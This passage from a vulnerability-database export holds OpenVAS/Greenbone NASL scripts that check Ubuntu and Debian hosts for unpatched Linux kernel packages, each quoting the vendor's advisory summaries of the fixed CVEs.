FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843647\");\n script_version(\"$Revision: 14288 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-02 08:12:15 +0200 (Tue, 02 Oct 2018)\");\n script_cve_id(\"CVE-2018-17182\", \"CVE-2018-15594\", \"CVE-2018-15572\", \"CVE-2018-10853\",\n \"CVE-2018-14633\", \"CVE-2018-6554\", \"CVE-2018-6555\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3777-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Jann Horn discovered that the vmacache subsystem did not properly handle\nsequence number overflows, leading to a use-after-free vulnerability. A\nlocal attacker could use this to cause a denial of service (system crash)\nor execute arbitrary code. (CVE-2018-17182)\n\nIt was discovered that the paravirtualization implementation in the Linux\nkernel did not properly handle some indirect calls, reducing the\neffectiveness of Spectre v2 mitigations for paravirtual guests. A local\nattacker could use this to expose sensitive information. 
(CVE-2018-15594)\n\nIt was discovered that microprocessors utilizing speculative execution and\nprediction of return addresses via Return Stack Buffer (RSB) may allow\nunauthorized memory reads via sidechannel attacks. An attacker could use\nthis to expose sensitive information. (CVE-2018-15572)\n\nAndy Lutomirski and Mika Penttilä discovered that the KVM implementation\nin the Linux kernel did not properly check privilege levels when emulating\nsome instructions. An unprivileged attacker in a guest VM could use this to\nescalate privileges within the guest. (CVE-2018-10853)\n\nIt was discovered that a stack-based buffer overflow existed in the iSCSI\ntarget implementation of the Linux kernel. A remote attacker could use this\nto cause a denial of service (system crash). (CVE-2018-14633)\n\nIt was discovered that a memory leak existed in the IRDA subsystem of the\nLinux kernel. A local attacker could use this to cause a denial of service\n(kernel memory exhaustion). (CVE-2018-6554)\n\nIt was discovered that a use-after-free vulnerability existed in the IRDA\nimplementation in the Linux kernel. A local attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. 
(CVE-2018-6555)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 18.04 LTS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"USN\", value:\"3777-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3777-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU18\\.04 LTS\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU18.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-1021-gcp\", ver:\"4.15.0-1021.22\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-1021-oem\", ver:\"4.15.0-1021.24\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-1023-aws\", ver:\"4.15.0-1023.23\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-1023-kvm\", ver:\"4.15.0-1023.23\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-1024-raspi2\", ver:\"4.15.0-1024.26\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-36-generic\", ver:\"4.15.0-36.39\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-36-generic-lpae\", 
ver:\"4.15.0-36.39\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-36-lowlatency\", ver:\"4.15.0-36.39\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-36-snapdragon\", ver:\"4.15.0-36.39\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.15.0.1023.23\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gcp\", ver:\"4.15.0.1021.23\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.15.0.36.38\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.15.0.36.38\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gke\", ver:\"4.15.0.1021.23\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-kvm\", ver:\"4.15.0.1023.23\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.15.0.36.38\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-oem\", ver:\"4.15.0.1021.23\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.15.0.1024.22\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-snapdragon\", ver:\"4.15.0.36.38\", rls:\"UBUNTU18.04 
LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2019-05-29T18:33:23", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-18T00:00:00", "published": "2018-10-02T00:00:00", "id": "OPENVAS:1361412562310843644", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843644", "title": "Ubuntu Update for linux-gcp USN-3777-2", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3777_2.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for linux-gcp USN-3777-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843644\");\n script_version(\"$Revision: 14288 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-02 08:07:24 +0200 (Tue, 02 Oct 2018)\");\n script_cve_id(\"CVE-2018-17182\", \"CVE-2018-15594\", \"CVE-2018-15572\", \"CVE-2018-10853\",\n \"CVE-2018-14633\", \"CVE-2018-6554\", \"CVE-2018-6555\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-gcp USN-3777-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-gcp'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3777-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 18.04 LTS for Ubuntu\n16.04 LTS.\n\nJann Horn discovered that the vmacache subsystem did not properly handle\nsequence number overflows, leading to a use-after-free vulnerability. A\nlocal attacker could use this to cause a denial of service (system crash)\nor execute arbitrary code. 
(CVE-2018-17182)\n\nIt was discovered that the paravirtualization implementation in the Linux\nkernel did not properly handle some indirect calls, reducing the\neffectiveness of Spectre v2 mitigations for paravirtual guests. A local\nattacker could use this to expose sensitive information. (CVE-2018-15594)\n\nIt was discovered that microprocessors utilizing speculative execution and\nprediction of return addresses via Return Stack Buffer (RSB) may allow\nunauthorized memory reads via sidechannel attacks. An attacker could use\nthis to expose sensitive information. (CVE-2018-15572)\n\nAndy Lutomirski and Mika Penttilä discovered that the KVM implementation\nin the Linux kernel did not properly check privilege levels when emulating\nsome instructions. An unprivileged attacker in a guest VM could use this to\nescalate privileges within the guest. (CVE-2018-10853)\n\nIt was discovered that a stack-based buffer overflow existed in the iSCSI\ntarget implementation of the Linux kernel. A remote attacker could use this\nto cause a denial of service (system crash). (CVE-2018-14633)\n\nIt was discovered that a memory leak existed in the IRDA subsystem of the\nLinux kernel. A local attacker could use this to cause a denial of service\n(kernel memory exhaustion). (CVE-2018-6554)\n\nIt was discovered that a use-after-free vulnerability existed in the IRDA\nimplementation in the Linux kernel. A local attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. 
(CVE-2018-6555)\");\n script_tag(name:\"affected\", value:\"linux-gcp on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"USN\", value:\"3777-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3777-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-1021-gcp\", ver:\"4.15.0-1021.22~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-36-generic\", ver:\"4.15.0-36.39~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-36-generic-lpae\", ver:\"4.15.0-36.39~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-36-lowlatency\", ver:\"4.15.0-36.39~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gcp\", ver:\"4.15.0.1021.35\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-hwe-16.04\", ver:\"4.15.0.36.59\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"linux-image-generic-lpae-hwe-16.04\", ver:\"4.15.0.36.59\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gke\", ver:\"4.15.0.1021.35\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-hwe-16.04\", ver:\"4.15.0.36.59\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-oem\", ver:\"4.15.0.36.59\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2019-05-29T18:33:30", "bulletinFamily": "scanner", "description": "The previous update to linux failed to build for the armhf (ARM EABI\nhard-float) architecture. This update corrects that. For all other\narchitectures, there is no need to upgrade or reboot again. 
For\nreference, the relevant part of the original advisory text follows.\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-5715\n\nMultiple researchers have discovered a vulnerability in various\nprocessors supporting speculative execution, enabling an attacker\ncontrolling an unprivileged process to read memory from arbitrary\naddresses, including from the kernel and all other processes\nrunning on the system.\n\nThis specific attack has been named Spectre variant 2 (branch\ntarget injection) and is mitigated for the x86 architecture (amd64\nand i386) by using new microcoded features.\n\nThis mitigation requires an update to the processor", "modified": "2019-03-18T00:00:00", "published": "2018-07-16T00:00:00", "id": "OPENVAS:1361412562310891422", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891422", "title": "Debian LTS Advisory ([SECURITY] [DLA 1422-2] linux security update)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_dla_1422.nasl 14281 2019-03-18 14:53:48Z cfischer $\n#\n# Auto-generated from advisory DLA 1422-2 using nvtgen 1.0\n# Script version: 2.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR 
PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891422\");\n script_version(\"$Revision: 14281 $\");\n script_cve_id(\"CVE-2017-5715\", \"CVE-2017-5753\", \"CVE-2018-1000204\", \"CVE-2018-1066\", \"CVE-2018-10853\",\n \"CVE-2018-1093\", \"CVE-2018-10940\", \"CVE-2018-1130\", \"CVE-2018-11506\", \"CVE-2018-12233\",\n \"CVE-2018-3665\", \"CVE-2018-5814\", \"CVE-2018-9422\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 1422-2] linux security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:53:48 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-16 00:00:00 +0200 (Mon, 16 Jul 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/07/msg00016.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"linux on Debian Linux\");\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n3.16.57-1. 
This update additionally fixes Debian bug #898165, and\nincludes many more bug fixes from stable update 3.16.57.\n\nWe recommend that you upgrade your linux packages.\");\n script_tag(name:\"summary\", value:\"The previous update to linux failed to build for the armhf (ARM EABI\nhard-float) architecture. This update corrects that. For all other\narchitectures, there is no need to upgrade or reboot again. For\nreference, the relevant part of the original advisory text follows.\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-5715\n\nMultiple researchers have discovered a vulnerability in various\nprocessors supporting speculative execution, enabling an attacker\ncontrolling an unprivileged process to read memory from arbitrary\naddresses, including from the kernel and all other processes\nrunning on the system.\n\nThis specific attack has been named Spectre variant 2 (branch\ntarget injection) and is mitigated for the x86 architecture (amd64\nand i386) by using new microcoded features.\n\nThis mitigation requires an update to the processor's microcode,\nwhich is non-free. For recent Intel processors, this is included\nin the intel-microcode package from version 3.20180425.1~deb8u1.\nFor other processors, it may be included in an update to the\nsystem BIOS or UEFI firmware, or in a later update to the\namd64-microcode package.\n\nThis vulnerability was already mitigated for the x86 architecture\nby the 'retpoline' feature.\n\nDescription truncated. 
Please see the references for more information.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-arm\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-x86\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.9-x86\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-doc-3.16\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-586\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-686-pae\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-amd64\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-armel\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-armhf\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-i386\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-amd64\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-armmp\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-armmp-lpae\", ver:\"3.16.57-1\", 
rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-common\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-ixp4xx\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-kirkwood\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-orion5x\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-versatile\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-586\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-686-pae\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-all\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-all-amd64\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-all-armel\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-all-armhf\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-all-i386\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-amd64\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-armmp\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-armmp-lpae\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = 
isdpkgvuln(pkg:\"linux-headers-3.16.0-5-common\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-ixp4xx\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-kirkwood\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-orion5x\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-versatile\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-586\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-686-pae\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-all\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-all-amd64\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-all-armel\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-all-armhf\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-all-i386\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-amd64\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-armmp\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-armmp-lpae\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-common\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) 
{\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-ixp4xx\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-kirkwood\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-orion5x\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-versatile\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-586\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-686-pae\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-686-pae-dbg\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-amd64\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-amd64-dbg\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-armmp\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-armmp-lpae\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-ixp4xx\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-kirkwood\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-orion5x\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-versatile\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-5-586\", ver:\"3.16.57-1\", rls:\"DEB8\")) 
